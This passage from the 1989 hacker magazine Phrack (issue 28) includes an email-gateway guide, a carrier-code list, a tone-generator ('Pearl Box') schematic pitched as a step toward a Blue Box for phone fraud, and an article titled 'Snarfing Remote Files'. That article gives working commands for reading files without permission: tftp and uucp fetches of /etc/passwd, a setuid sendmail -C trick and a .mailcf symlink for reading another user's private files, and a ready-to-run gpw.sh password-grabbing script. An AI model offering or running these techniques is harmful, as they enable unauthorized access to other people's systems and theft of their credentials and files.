  1423. networks is the cost.  Subscription costs as of 3/3/89 cost $4.75
  1424. per month or $5.75 per month for hosts that are outside of the
  1425. U.S.A.
  1426.  
  1427. You are also charged for each message that you send.  If you are
  1428. corresponding with someone who is not a DASnet subscriber, THEIR
  1429. MAIL TO YOU is billed to your account.
  1430.  
  1431. The following is an abbreviated cost list for mailing to the
  1432. different services of DASnet:
  1433.  
  1434.      PARTIAL List                DASnet Cost    DASnet Cost
  1435.      of Services                  1st 1000    Each Add'l 1000
  1436.      Linked by DASnet (e-mail)   Characters     Characters:
  1437.  
  1438.      INET, MacNET, PeaceNet,                             NOTE:  20 lines
  1439.      Unison, UUCP*, Domains,        .21            .11   of text is app.
  1440.      e.g. .COM, .EDU*                                    1000 characters.
  1441.  
  1442.      Dialcom--Any "host" in U.S.    .36            .25
  1443.  
  1444.      Dialcom--Hosts outside U.S.    .93            .83
  1445.  
  1446.      EasyLink (From EasyLink)       .21            .11
  1447.               (To EasyLink)         .55            .23
  1448.  
  1449.      U.S. FAX (internat'l avail.)   .79            .37
  1450.  
  1451.      GeoMail--Any "host" in U.S.    .21            .11
  1452.      GeoMail--Hosts outside U.S.    .74            .63
  1453.  
  1454.      MCI  (from MCI)                .21            .11
  1455.           (to MCI)                  .78            .25
  1456.           (Paper mail - USA)       2.31            .21
  1457.  
  1458.      Telemail                       .36            .25
  1459.  
  1460.      W.U. Telex--United States     1.79           1.63
  1461.      (You can also send Telexes outside the U.S.)
  1462.  
  1463.      TWICS--Japan                   .89            .47
  1464.  
  1465.   *  The charges given here are to the gateway to the network.  The DASnet
  1466.      user is not charged for transmission on the network itself.
  1467.  
  1468. Subscribers to DASnet get a free DASnet Network Directory as well
  1469. as a listing in the directory, and the ability to order optional
  1470. DASnet services like auto-porting or DASnet Telex Service which
  1471. gives you your own Telex number and answerback for $8.40 a month
  1472. at this time.
  1473.  
  1474. DASnet is a registered trademark of DA Systems, Inc.
  1475.  
  1476.                                DA Systems, Inc.  1503 E. Campbell
  1477.                              Ave.
  1478.                               Campbell, CA  95008 408-559-7434
  1479.                              TELEX:  910 380-3530
  1480.  
  1481. The following two sections on PeaceNet and AppleLink are in
  1482. association with DASnet as this network is what is used to
  1483. connect them to the Wide-Area Networks.
  1484.  
  1485. APPLELINK ~~~~~~~~~ AppleLink is a service of Apple Computer.
  1486. They have their own little network and there are a couple of
  1487. things to know about it.
  1488.  
  1489. First of all, there is an AppleLink-Bitnet Mail Relay which was
  1490. created to "enrich the cooperative research relationship of Apple
  1491. Computer and the higher education community by facilitating the
  1492. electronic exchange of information." Any Bitnet user is
  1493. automatically authorized to use the mail relay as well as all
  1494. AppleLink users.
  1495.  
  1496. To send to AppleLink from Bitnet, your header should be as
  1497. follows:
  1498.  
  1499. To:  XB.DAS@STANFORD.BITNET Subject:  username@APPLELINK!Hi, how
  1500. are things at Apple?
  1501.  
  1502. The username is the user's ID that you are sending to and the "!"
  1503. separates the DASnet To:  field from the real subject.
  1504.  
  1505. To send to Bitnet from AppleLink, your header should be as
  1506. follows:
  1507.  
  1508. To:  DASNET Subject:  C488869@UMCVMB.BITNET!Please add me to the
  1509. Phrack Subscription List.
  1510.  
  1511. The C488869@UMCVMB.BITNET (my address) is any Bitnet address and
  1512. as above, the "!" separates the address from the subject of the
  1513. message.
  1514.  
  1515. There is one other thing to mention.  Apparently, sending to
  1516. username@APPLELINK.APPLE.COM also will perform the same function.
  1517. If this does not work, try routing to
  1518. username%APPLELINK.APPLE.COM@APPLE.COM.
  1519.  
  1520. PEACENET ~~~~~~~~ PeaceNet is a computer-based communication
  1521. system "helping the peace movement throughout the world
  1522. communicate and cooperate more effectively and efficiently,"
  1523. according to their information flier.  It is networked through
  1524. Telenet and can be reached via dial-up.  To subscribe to this
  1525. service, it costs $10 to sign up.  With this sign-up fee, you
  1526. receive a user's manual and a "free" hour of off-peak computer
  1527. time (which is weekday evenings, weekends, and
  1528. holidays).  Beyond this, you pay a monthly $10 fee for another
  1529. hour of off-peak computer usage and you pay $5 for additional
  1530. PEAK hour usage.  They charge, also, for users who require extra
  1531. space on their system.  I guess peace carries a heavy cost in the
  1532. long run!  You do get 2 free hours of off-peak time though for
  1533. every additional user you bring to PeaceNet.  It is a project of
  1534. the Tides Foundation, a San Franciscan public charity, and is
  1535. managed by 3 national peace organizations (non-profit, of
  1536. course!).  Anyway, to join PeaceNet, send your name,
  1537. organizational affiliation, address, city, state, zip code,
  1538. telephone number, and who referred you to PeaceNet as well as
  1539. your credit card number with expiration date (and the name on the
  1540. card if it's different than yours) to PeaceNet, 3228 Sacramento
  1541. Street, San Francisco, CA 94115 or call them at 415-923-0900.
  1542. You can also pay by check but that requires a $50 deposit.
  1543.  
  1544. FIDONET
  1545. ~~~~~~~
  1546. FIDONET is, of course, the ever-popular group of IBM bulletin
  1547. boards that made it possible for networking to be incorporated
  1548. into bulletin board systems.  FIDONET seems to have a number of
  1549. gateways in the Wide-Area Networks.  First of all, it has its own
  1550. domain -- .ifna.org -- which makes it possible to mail right to
  1551. FIDONET without routing through UUCP gateways or whatever.  The
  1552. format for this gateway is:
  1553.  
  1554. Username@f<node #>.n<net #>.z<zone #>.ifna.org
  1555.  
  1556. In other words, if I wanted to mail to Silicon Swindler at
  1557. 1:135/5, the address would be
  1558. Silicon_Swindler@f5.n135.z1.ifna.org and, provided that your
  1559. mailer knows the .ifna.org domain, it should get through alright.
  1560. Apparently, as of the writing of this article, they have
  1561. implemented a new gateway name called fidonet.org which should
  1562. work in place of ifna.org in all routings.  If your mailer does
  1563. not know either of these domains, use the above routing but
  1564. replace the first "@" with a "%" and then afterwards, use either
  1565. of the following mailers after the "@":  CS.ORST.EDU or
  1566. K9.CS.ORST.EDU (i.e. username%f<node #>.n<net #>.z<zone
  1567. #>.fidonet.org@CS.ORST.EDU [or replace CS.ORST.EDU with
  1568. K9.CS.ORST.EDU]).
  1569.  
  1570. The following is a list compiled by Bill Fenner (WCF@PSUECL.BITNET) that was
  1571. posted on INFONETS DIGEST which lists a number of FIDONET gateways:
  1572.  
  1573. Net      Node    Node Name
  1574. ~~~      ~~~~    ~~~~~~~~~
  1575. 104      56      milehi.ifna.org
  1576. 105      55      casper.ifna.org
  1577. 107      320     rubbs.ifna.org
  1578. 109      661     blkcat.ifna.org
  1579. 125      406     fidogate.ifna.org
  1580. 128      19      hipshk.ifna.org
  1581. 129      65      insight.ifna.org
  1582. 143      N/A     fidogate.ifna.org
  1583. 152      200     castle.ifna.org
  1584. 161      N/A     fidogate.ifna.org
  1585. 369      17      megasys.ifna.org
  1586.  
  1587. NOTE:  The UUCP equivalent node name is the first part of the node name.  In
  1588.        other words, the UUCP node milehi is listed as milehi.ifna.org but can
  1589.        be mailed directly over the UUCP network.
  1590.  
  1591. Another way to mail to FIDONET, specifically for Internet people, is in this
  1592. format:
  1593.  
  1594. ihnp4!necntc!ncoast!ohiont!<net #>!<node #>!user_name@husc6.harvard.edu
  1595.  
  1596. And for those UUCP mailing people out there, just use the path described and
  1597. ignore the @husc5.harvard.edu portion. There is a FIDONET NODELIST available on
  1598. most any FIDONET bulletin board, but it is quite large.
  1599.  
  1600. ONTYME
  1601. ~~~~~~
  1602. Previously known as Tymnet, OnTyme is the McDonnell Douglas revision.  After
  1603. they bought out Tymnet, they renamed the company and opened an experimental
  1604. Internet gateway at ONTYME.TYMNET.COM but this is supposedly only good for
  1605. certain corporate addresses within McDonnell Douglas and Tymnet, not their
  1606. customers.  The userid format is xx.yyy or xx.y/yy where xx is a net name and
  1607. yyy (or y/yy) is a true username.  If you cannot directly nail this, try:
  1608.  
  1609. xx.yyy%ONTYME.TYMNET.COM@TYMIX.TYMNET.COM
  1610.  
  1611. A subnet of Tymnet is called GeoNet.  It is a private X.25-based
  1612. subnet that is operated by the U.S. Geological Survey, a bureau
  1613. of the U.S. Department of the Interior.  It supports about 165
  1614. host computers including about 75 USGS Primes, 50 VAXen, and 2
  1615. Amdahls.  One of their VAX systems is on BITnet at USGSRESV and
  1616. they have SPAN nodes at IFLAG1.SPAN and EROSA.SPAN.
  1617.  
  1618. THENET
  1619. ~~~~~~
  1620. The Texas Higher Education Network (THEnet) is comprised of many
  1621. of the institutions of higher education in the state of Texas.
  1622. Its backbone network protocol is DECnet.  THEnet has recently
  1623. been designated as an NSF regional network, distributing Internet
  1624. Protocol (IP) access over DECnet in some cases and utilizing
  1625. multi-protocol routers in others.  THEnet has a NIC (Network
  1626. Information Center) at THENIC.THE.NET and addresses within THEnet
  1627. are probably routed to user@destination.THE.NET.
  1628.  
  1629. UUCP PATHS AND NODE INFORMATION
  1630. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1631. Many UUCP Unix nodes have the commands uuhosts and uupath.  The
  1632. uuhosts command allows you to receive information about a
  1633. specified UUCP node such as the path, node contact, how it is
  1634. polled for USENET feeds, etc.  The uupath command simply tells
  1635. you the path from one UUCP node to another.  Well, although at
  1636. this time, this is only good for Bitnet users, this interactive
  1637. message feature is good to know just in case you need to know a
  1638. path to a particular node.  For IBM systems using RSCS network
  1639. software, use the command
  1640.  
  1641. SM RSCS CMD PSUVAX1 UUPATH node1 node2 ...
  1642.  
  1643.      (For people on VAXen with JNET network software, the format is:     )
  1644.      (SEND/COMMAND PSUVAX1 UUPATH node1                                  )
  1645.  
  1646. to receive standard information listed above from the uupath command.
  1647.  
  1648. Multiple nodes can be listed where node1 node2 represent separate UUCP nodes.
  1649.  
  1650. I've found that this can be useful in finding surrounding nodes
  1651. of the destination node in case you have a problem mailing
  1652. through a particular path or node.  You can, with this command,
  1653. use alternate routings by specifying them with a "bang-path" that
  1654. will indicate to the UUCP gateway where the message is to be sent
  1655. to next.  This is in the format of, say,
  1656. "psuvax1!catch22!msp!taran@UUCPGATE" or whatever where UUCPGATE
  1657. can be any UUCP gateway such as PSUVAX1 or UUNET.UU.NET to name a
  1658. few.
  1659.  
  1660. NICS
  1661. ~~~~
  1662. The Network Information Centers (NICs) can be extremely useful in
  1663. figuring out various problems on the networks, such as routings
  1664. or the place at which the node resides, etc.
  1665.  
  1666. BITNIC is the BITnet Network Information Center which is located
  1667. in New Jersey.  Its node name is BITNIC.BITNET and it contains a
  1668. variety of resources which can be utilized via mail or via direct
  1669. messages from Bitnet users.
  1670.  
  1671. The DATABASE@BITNIC contains lists of all kinds.  This database
  1672. does not limit itself to information about the networks.  It does
  1673. contain this information, but also holds various trivialities.
  1674. Send the HELP command either via direct message to
  1675. DATABASE@BITNIC if on Bitnet or send mail to that address
  1676. containing the command you wish to perform (i.e. send a message
  1677. saying HELP to DATABASE@BITNIC.BITNET from another network or
  1678. from Bitnet if you're at a node without direct message
  1679. capabilities).
  1680.  
  1681. LISTSERV@BITNIC contains the standard listserver files that you'd
  1682. expect to find plus some other interesting ones.  I'm not going
  1683. to take the time to tutor you, the reader, in using these, so
  1684. just send a HELP command the same as you would to DATABASE@BITNIC
  1685. for more information.
  1686.  
  1687. NETSERV@BITNIC is a file server which contains information files
  1688. pertaining to various networks that are connected to Bitnet, as
  1689. well as files about Bitnet.  From here, you can get network node
  1690. lists, information files on networks such as SPAN, ARPANET,
  1691. NETNORTH, etc. and other network related files.  This can be an
  1692. extremely useful resource when you're trying to mail someone at
  1693. another network.
  1694.  
  1695. The Data Defense Network NIC (DDN NIC) is located at SRI-NIC.ARPA
  1696. and has various useful files about the DDN as well as the
  1697. Internet.
  1698.  
  1699. There are a number of ways to obtain information from the DDN
  1700. NIC.  First of all, people on the Internet with the Telnet
  1701. capability can Telnet to SRI-NIC.ARPA and perform a number of
  1702. procedures from the pre-login screen.  First of all, you can get
  1703. TAC News updates by typing TACNEWS.  The NIC command allows you
  1704. to find various facts about the whereabouts of network
  1705. information files, etc.  The WHOIS command is probably the most
  1706. useful of these 3.  The WHOIS program allows you to find
  1707. addresses for registered users of the networks as well as
  1708. information about networks and nodes on the networks, depending
  1709. on what you ask the WHOIS program for.  To find only a certain
  1710. record type, you can use the following specifiers:
  1711.  
  1712. Arpanet        DOmain         GAteway        GRoup          HOst           IMp
  1713. Milnet         NEtwork        Organization   PSn            TAc
  1714.  
  1715. To search for a specific field, use the following specifiers:
  1716.  
  1717. HAndle or "!"    Mailbox or if it contains "@"        NAme or a "." leading
  1718.  
  1719. These features return whatever information is available from the DDN NIC
  1720. database.  If you do not have the capability to use Telnet, mail can be sent to
  1721. SERVICE@SRI-NIC.ARPA with the "SUBJECT:" line containing the following
  1722. commands:
  1723.  
  1724. HELP          This will send you a help file for using the DDN NIC.
  1725. RFC nnn       This sends you a Request For Comments file (where nnn is either
  1726.               the number of the RFC file or else is INDEX to list them).
  1727. IEN nnn       This sends you an Internet Engineering Notes file where nnn is
  1728.               the same as above.
  1729. NETINFO xxx   This feature allows you to get files about the networks where
  1730.               xxx is the filename or else the word INDEX for a list of
  1731.               available files.
  1732. HOST xxx      This returns information pertaining to the xxx host specified.
  1733. WHOIS xxx     This is the same as using the WHOIS command from Telnet.  For
  1734.               details on how to use this, send the WHOIS HELP command on the
  1735.               "Subject:" line.
  1736.  
  1737. There are other Network Information Centers throughout the networks but as far
  1738. as I know, their abilities are nothing near as powerful as SRI-NIC.ARPA.  They
  1739. are the places, though, to mail to for answers concerning those networks if
  1740. you have some question as to the workings of the network or anything else.
  1741. _______________________________________________________________________________
  1742.  
  1743.                                 ==Phrack Inc.==
  1744.  
  1745.                      Volume Three, Issue 28, File #5 of 12
  1746.  
  1747.                   /////////////////////\\\\\\\\\\\\\\\\\\\\\
  1748.                  ||                                        ||
  1749.                  || A Real Functioning PEARL BOX Schematic ||
  1750.                  ||                                        ||
  1751.                  ||        Written, Tested, and Used       ||
  1752.                  ||                                        ||
  1753.                  ||               by Dispater              ||
  1754.                  ||                                        ||
  1755.                  ||              July 1, 1989              ||
  1756.                  ||                                        ||
  1757.                   \\\\\\\\\\\\\\\\\\\\\/////////////////////
  1758.  
  1759.  
  1760. Introduction:  After reading the earlier renditions of schematics
  1761.                for the Pearl Box, I decided that there was an
  1762.                easier and cheaper way of doing the same thing
  1763.                with an IC and parts you probably have just laying
  1764.                around the house.
  1765.  
  1766.  
  1767. What Is A Pearl Box and Why Do I Want One?
  1768.  
  1769.      A Pearl Box is a tone generating device that is used to make
  1770.      a wide range of single tones.  Therefore, it would be very
  1771.      easy to modify this basic design to make a Blue Box by
  1772.      making 2 Pearl Boxes and joining them together in some
  1773.      fashion.
  1774.  
  1775.      A Pearl Box can be used to create any tone you wish that
  1776.      other boxes may not.  It also has a tone sweep option that
  1777.      can be used for numerous things like detecting different
  1778.      types of phone tapping devices.
  1779.  
  1780.  
  1781. Parts List:
  1782.  
  1783.         CD4049 RCA integrated circuit
  1784.         .1 uF disk capacitor
  1785.         1 uF 16V electrolitic capacitor
  1786.         1K resistor
  1787.         10M resistor
  1788.         1meg pot
  1789.         1N914 diode
  1790.         Some SPST momentary push-button switches
  1791.         1 SPDT toggle switch
  1792.         9 Volt battery & clip
  1793.         and miscellaneous stuff you should have laying around the house.
  1794.  
  1795.  
  1796. State-of-the-Art-Text Schematic:
  1797.                                        +  16V  1uF -
  1798.               _______________________________||_____
  1799.              |        !     !                ||     |           _
  1800.              |   _______________________            |__________| |/| 8ohms
  1801.          ____|__|_____:__|__:__|_       |            __________| | |
  1802.         | 9 10 11 12 13 14 15 16 |      |           |          |_|\|
  1803.         |        CD4049UBE       |      |           |
  1804.         |_1__2__3__4__5__6__7__8_|      :           |          _
  1805.           |  |  |__|  |__|  |  |____________________|_________[-]
  1806.           |  |  !           !           :                     [b]
  1807.           |  |__________________________|                     [a]
  1808.           |     :           :           |                     [t]
  1809.           |     !    1N914  !           !                     [t]
  1810.           |___________|/|_____________________________________[+]
  1811.                 :     |\|   :           :
  1812.                 |           |           |
  1813.                 |    10M    |           |
  1814.                 |___/\/\/\__|           |
  1815.                 |           |           |
  1816.                 |_____||____|           |  <-- These 2 wires to the center pole
  1817.                       ||    |           |      of switch.
  1818.                  .1uF   50V |           |
  1819.                             |           |
  1820.      _______________________|           |_____________________________
  1821.     |                   ___[Toggle Switch]____________                |
  1822.     |                  |                              |          ___  |
  1823.     |                  |                              |          o o  |
  1824.     |                  |                              | /\/\/\___| |__|
  1825.     |_/\/\/\____/\/\/\ |                              |    ^          |
  1826.         1K         ^   |                              |____|     ___  |
  1827.                    |___|                              |          o o  |
  1828.                                                       | /\/\/\___| |__|
  1829.           (pot side)                    (push-button  |  ^
  1830.                                             side)     |__|
  1831.  
  1832. Explanation:
  1833.  
  1834.      The 2 wires that lead from the main part of the circuit
  1835.      should be connected to the center poles on the toggle
  1836.      switch.  Put the 2 wires to the pot on one side and the 2
  1837.      wires going to the push-buttons to the other side.  That way
  1838.      you can switch between tone sweep and the favorite tones you
  1839.      like (the push-button side).
  1840.  
  1841.      To keep tones that you want to use frequently like 1850 Hz
  1842.      then all you have to do is put in a variable resistor and
  1843.      adjust it to where you have the correct tone, then just put
  1844.      a push-button switch on the line.  You can link them
  1845.      together in a chain, etc.  There are many other good
  1846.      modifications to make to the box so have fun and be smart.
  1847.  
  1848. --Dispater
  1849.  
  1850. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\?///////////////////////////////////////
  1851.                                 ==Phrack Inc.==
  1852.  
  1853.                      Volume Three, Issue 28, File #6 of 12
  1854.  
  1855.                      +++++++++++++++++++++++++++++++++++++
  1856.                      +                                   +
  1857.                      +       Snarfing Remote Files       +
  1858.                      +                                   +
  1859.                      +                by                 +
  1860.                      +                                   +
  1861.                      +           Dark OverLord           +
  1862.                      +                                   +
  1863.                      +++++++++++++++++++++++++++++++++++++
  1864.  
  1865. There are many ways of getting copies of files from a remote
  1866. system that you do not have permission to read or an account on
  1867. login on to and access them through.  Many administrators do not
  1868. even bother to restrict many access points that you can use.
  1869.  
  1870. Here are the simplest ways:
  1871.  
  1872.  
  1873. A)  Use uucp(1) [Trivial File Transfer Protocol] to retrieve a copy
  1874.     of a file if you are running on an Internet based network.
  1875.  
  1876. B) Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy
  1877.    of a file if uucp connections are running on that system.
  1878.  
  1879. C) Access one of many known security loopholes.
  1880.  
  1881.  
  1882. In the following examples, we will use the passwd file as the
  1883. file to acquire since it is a readable file that can be found on
  1884. most systems that these attacks are valid on.
  1885.  
  1886. Method A :
  1887.  
  1888. 1) First start the tftp program:  Enter the command:
  1889.  
  1890.  tftp
  1891.  
  1892.     [You have the following prompt:]
  1893.  
  1894.  tftp>
  1895.  
  1896.  
  1897. 2) The next step is to connect to the system that you wish to
  1898.     retrieve files from.  At the tftp, type:
  1899.  
  1900.  tftp> connect other.system.com
  1901.  
  1902.  
  1903. 3) Now request the file you wish to get a copy of (in our case, the
  1904.     passwd file /etc/passwd ):
  1905.  
  1906.  tftp> get /etc/passwd /tmp/passwd
  1907.  
  1908.     [You should see something that looks like the following:]
  1909.  
  1910.  Received 185659 bytes in 22 seconds.
  1911.  
  1912. 4) Now exit the tftp program with the "quit" command:
  1913.  
  1914.  tftp> quit
  1915.  
  1916. You should now have a copy of other.system.com's passwd file in
  1917. your directory.
  1918.  
  1919. NOTE:  Some Unix systems' tftp programs have a different syntax.
  1920.        The above was tested under SunOS 4.0
  1921.  
  1922. For example, on Apollos, the syntax is:
  1923.  
  1924.     tftp -{g|g!|p|r|w} <local file> <host> <foreign file>
  1925. [netascii|image]
  1926.  
  1927. Thus you must use the command:
  1928.  
  1929.  tftp -g password_file networked-host /etc/passwd
  1930.  
  1931. Consult your local "man" pages for more info (or in other words
  1932. RTFM).
  1933.  
  1934. At the end of this article, I will include a shell script that
  1935. will snarf a password file from a remote host.  To use it type:
  1936.  
  1937.  gpw system_name
  1938.  
  1939. Method B :
  1940.  
  1941. Assuming we are getting the file  /etc/passwd  from the system
  1942. uusucker, and our system has a direct uucp connection to that
  1943. system, it is possible to request a copy of the file through the
  1944. uucp links.  The following command will request that a copy of
  1945. the passwd file be copied into uucp's home directory
  1946. /usr/spool/uucppublic :
  1947.  
  1948.  uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd'
  1949.  
  1950. The flag "-m" means you will be notified by mail when the transfer is
  1951. completed.
  1952.  
  1953. Method C:
  1954.  
  1955.     The third possible way to access the desired file requires
  1956. that you have the login permission to the system.
  1957.  
  1958. In this case we will utilize a well-known bug in Unix's sendmail
  1959. daemon.
  1960.  
  1961. The sendmail program has and option "-C" in which you can specify
  1962. the configuration file to use (by default this file is
  1963. /usr/lib/sendmail.cf or /etc/sendmail.cf).  It should also be
  1964. noted that the diagnostics outputted by sendmail contain the
  1965. offending lines of text.  Also note that the sendmail program
  1966. runs setuid root.
  1967.  
  1968. The way you can abuse this set of facts (if you have not yet
  1969. guessed) is by specifying the file you wish read as the
  1970. configuration file.  Thus the command:
  1971.  
  1972.  sendmail -C/usr/accounts/random_joe/private/file
  1973.  
  1974. Will give you a copy of random joe's private file.
  1975.  
  1976. Another similar trick is to symlink your .mailcf file to joe's
  1977. file and mail someone.  When mail executes sendmail (to send the
  1978. mail), it will load in your .mailcf and barf out joe's stuff.
  1979.  
  1980. First, link joe's file to your .mailcf .
  1981.  
  1982.  ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf
  1983.  
  1984. Next, send mail to someone.
  1985.  
  1986.  mail C488869@umcvmb.missouri.edu
  1987.  
  1988. And have fun.
  1989.  
  1990. -=-Cut Here=-=-=-Cut Here=-=-=- gpw.sh =-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-=
  1991. :
  1992. : gpw copyright(c) Dark Overlord
  1993. :
  1994. /usr/ucb/tftp $1 << EOF
  1995. mode ascii
  1996. verbose
  1997. trace
  1998. get /etc/passwd /tmp/pw.$1
  1999. quit
  2000. EOF
  2001. -=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-=
  2002. ___________________________________________________________
  2003. ====================================================
  2004.  
  2005.                                 ==Phrack Inc.==
  2006.  
  2007.                      Volume Three, Issue 28, File #7 of 12
  2008.                      ____________________________________
  2009.                      \                                  /
  2010.                       \  Other Common Carriers (OCCs)  /
  2011.                        \                              /
  2012.                         \    A List By Equal Axis    /
  2013.                          \                          /
  2014.                           \   September 19, 1989   /
  2015.                            \______________________/
  2016.  
  2017. Hi everyone.  One hundred percent accuracy is not guaranteed.
  2018. Many small long distance companies operate for a few months or a
  2019. year and then then merge with others or go out of business, etc.
  2020. Also, not all of the places listed below work in every location.
  2021. The only ones you can assume work almost everywhere are MCI,
  2022. Sprint, AT&T, Western Union, and Telecom USA.  Most of the others
  2023. are strictly local, appearing in just a few states or cities.
  2024.  
  2025. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2026.  
  2027. 001     MidAmerican LD (Republic Telecom)
  2028. 002     AmeriCall LDC
  2029. 003     RCI Corporation
  2030. 007     Tel America
  2031. 011     Metromedia Long Distance
  2032. 012     Charter Corporation (Tri-J)
  2033. 013     Access Services
  2034. 021     Mercury
  2035. 022     MCI Telecommunications
  2036. 023     Texnet
  2037. 024     Petricca Communications Systems
  2038. 028     Texnet
  2039. 030     Valu-Line of Wichita Falls
  2040. 031     Teltec Saving Communications
  2041. 033     US Sprint
  2042. 036     Long Distance Savers
  2043. 039     Electronic Office Centers of America (EO/Tech)
  2044. 042     First Phone
  2045. 044     Allnet Communication Services (LDX, Lexitel)
  2046. 053     American Network (Starnet)
  2047. 056     American Satellite
  2048. 057     Long Distance Satellite
  2049. 059     COMNET
  2050. 060     Valu-Line of West Texas
  2051. 063     COMNET
  2052. 069     V/COM
  2053. 070     National Telephone Exchange
  2054. 080     AMTEL Systems
  2055. 084     Long Distance Service (LDS)
  2056. 085     WesTel
  2057. 088     Satellite Business Systems (MCI)
  2058. 089     Telephone Systems
  2059. 090     WesTel
  2060. 093     Rainbow Communications
  2061. 095     Southwest Communications
  2062. 099     AmeriCall
  2063. 122     RCA Global Communications
  2064. 137     All America Cables and Radio (ITT)
  2065. 142     First Phone
  2066. 146     ARGO Communications
  2067. 188     Satellite Business Systems
  2068. 201     PhoneNet
  2069. 202     ExecuLines
  2070. 203     Cypress Telecommunications (Cytel)
  2071. 204     United Telephone Long Distance
  2072. 206     United Telephone Long Distance
  2073. 211     RCI
  2074. 212     Call US
  2075. 213     Long Distance Telephone Savers
  2076. 214     Tyler Telecom
  2077. 215     Star Tel of Abilene
  2078. 217     Call US
  2079. 219     Call USA
  2080. 220     Western Union Telegraph
  2081. 222     MCI Telecommunications (SBS)
  2082. 223     Cable & Wireless Communication (TDX)
  2083. 224     American Communications
  2084. 227     ATH Communications (Call America)
  2085. 229     Bay Communications
  2086. 232     Superior Telecom
  2087. 233     Delta Communications
  2088. 234     AC Teleconnect (Alternative Communication)
  2089. 237     Inter-Comm Telephone
  2090. 239     Woof Communications (ACT)
  2091. 241     American Long Lines
  2092. 242     Choice Information Systems
  2093. 244     Automated Communications
  2094. 245     Taconic Long Distance Service
  2095. 250     Dial-Net
  2096. 252     Long Distance/USA
  2097. 253     Litel Telecommunications
  2098. 255     All-State Communications
  2099. 256     American Sharecom
  2100. 260     Advanced Communications Systems
  2101. 263     Com Systems (Sun Dial Communications)
  2102. 268     Compute-A-Call
  2103. 276     CP National (American Network, Starnet)
  2104. 284     American Telenet
  2105. 286     Clark Telecommunications
  2106. 287     ATS Communications
  2107. 288     AT&T Communications
  2108. 298     Thriftline
  2109. 302     Austin Bestline
  2110. 303     MidAmerican LD (Republic Telecom)
  2111. 311     SaveNet (American Network, Starnet)
  2112. 318     Long Distance Savers
  2113. 321     Southland Systems
  2114. 322     American Sharecom
  2115. 324     First Communication
  2116. 331     Texustel
  2117. 333     US Sprint
  2118. 336     Florida Digital Network
  2119. 338     Midco Communications
  2120. 339     Communication Cable Laying
  2121. 343     Communication Cable Laying
  2122. 345     AC Teleconnect (Alternative Communication)
  2123. 350     Dial-Net
  2124. 355     US Link
  2125. 357     Manitowoc Long Distance Service
  2126. 362     Electronic Office Centers of America (EO/Tech)
  2127. 363     Tel-Toll (Econ-O-Dial of Bishop)
  2128. 369     American Satellite
  2129. 373     Econo-Line Waco
  2130. 375     Wertern Union Telegraph
  2131. 385     The Switchboard
  2132. 393     Execulines of Florida
  2133. 400     American Sharecom
  2134. 404     MidAmerican LD (Republic Telecom)
  2135. 412     Penn Telecom
  2136. 428     Inter-Comm Telephone
  2137. 432     Lightcall
  2138. 435     Call-USA
  2139. 436     Indiana Switch
  2140. 440     Tex-Net
  2141. 441     Escondido Telephone
  2142. 442     First Phone
  2143. 444     Allnet Communication Services (LDX, Lexitel)
  2144. 455     Telecom Long Distance
  2145. 456     ARGO Communications
  2146. 462     American Network Services
  2147. 464     Houston Network
  2148. 465     Intelco
  2149. 466     International Office Networks
  2150. 469     GMW
  2151. 472     Hal-Rad Communications
  2152. 480     Chico Telecom (Call America)
  2153. 488     United States Transmission Systems (ITT)
  2154. 505     San Marcos Long Distance
  2155. 515     Burlington Telephone
  2156. 529     Southern Oregon Long Distance
  2157. 532     Long Distance America
  2158. 533     Long Distance Discount
  2159. 536     Long Distance Management
  2160. 550     Valu-Line of Alexandria
  2161. 551     Pittsburg Communication Systems
  2162. 552     First Phone
  2163. 555     TeleSphere Networks
  2164. 566     Cable & Wireless Communication (TDX)
  2165. 567     Advanced Marketing Services (Dial Anywhere)
  2166. 579     Lintel System (Lincoln Telephone LD)
  2167. 590     Wisconsin Telecommunications Tech
  2168. 599     Texas Long Distance Conroe
  2169. 601     Discount Communications Services
  2170. 606     Biz Tel Long Distance Telephone
  2171. 622     Metro America Communications
  2172. 634     Econo-Line Midland
  2173. 646     Contact America
  2174. 654     Cincinnati Bell Long Distance
  2175. 655     Ken-Tel Service
  2176. 660     Tex-Net
  2177. 666     Southwest Communications
  2178. 675     Network Services
  2179. 680     Midwest Telephone Service
  2180. 682     Ashland Call America
  2181. 684     Nacogdoches Telecommunications
  2182. 687     NTS Communications
  2183. 700     Tel-America
  2184. 704     Inter-Exchange Communications
  2185. 707     Telvue
  2186. 709     Tel-America
  2187. 717     Pass Word
  2188. 726     Procom
  2189. 727     Conroe-Comtel
  2190. 735     Marinette-Menominee Lds
  2191. 737     National Telecommunications
  2192. 741     ClayDesta
  2193. 742     Phone America of Carolina
  2194. 743     Peninsula Long Distance Service
  2195. 747     Standard Informations Services
  2196. 755     Sears Communication
  2197. 757     Pace Long Distance Service
  2198. 759     Telenet Communication (US Sprint)
  2199. 760     American Satellite
  2200. 766     Yavapai Telephone Exchange
  2201. 771     Telesystems
  2202. 777     US Sprint
  2203. 785     Olympia Telecom
  2204. 786     Shared Use Network Service
  2205. 787     Star Tel of Abilene
  2206. 788     ASCI's Telepone Express Network
  2207. 789     Microtel
  2208. 792     Southwest Communications
  2209. 800     Satelco
  2210. 801     MidAmerican LD (Republic)
  2211. 827     TCS Network Services
  2212. 833     Business Telecom
  2213. 839     Cable & Wireless Communication (TDX)
  2214. 847     VIP Connections
  2215. 850     TK Communications
  2216. 852     Telecommunicatons Systems
  2217. 859     Valu-Line of Longview
  2218. 866     Alascom
  2219. 872     Telecommunications Services
  2220. 874     Tri-Tel Communications
  2221. 879     Thriftycall (Lintel Systems)
  2222. 881     Coastal Telephone
  2223. 882     Tuck Data Communications
  2224. 883     TTI Midland-Odessa
  2225. 884     TTI Midland-Odessa
  2226. 885     The CommuniGroup
  2227. 888     Satellite Business Systems (MCI)
  2228. 895     Texas on Line
  2229. 897     Leslie Hammond (Phone America)
  2230. 898     Satellite Business Systems (MCI)
  2231. 910     Montgomery Telamarketing Communication
  2232. 915     Tele Tech
  2233. 933     North American Communications
  2234. 936     Rainbow Commuinications
  2235. 937     Access Long Distance
  2236. 938     Access Long Distance
  2237. 951     Transamerica Telecommunications
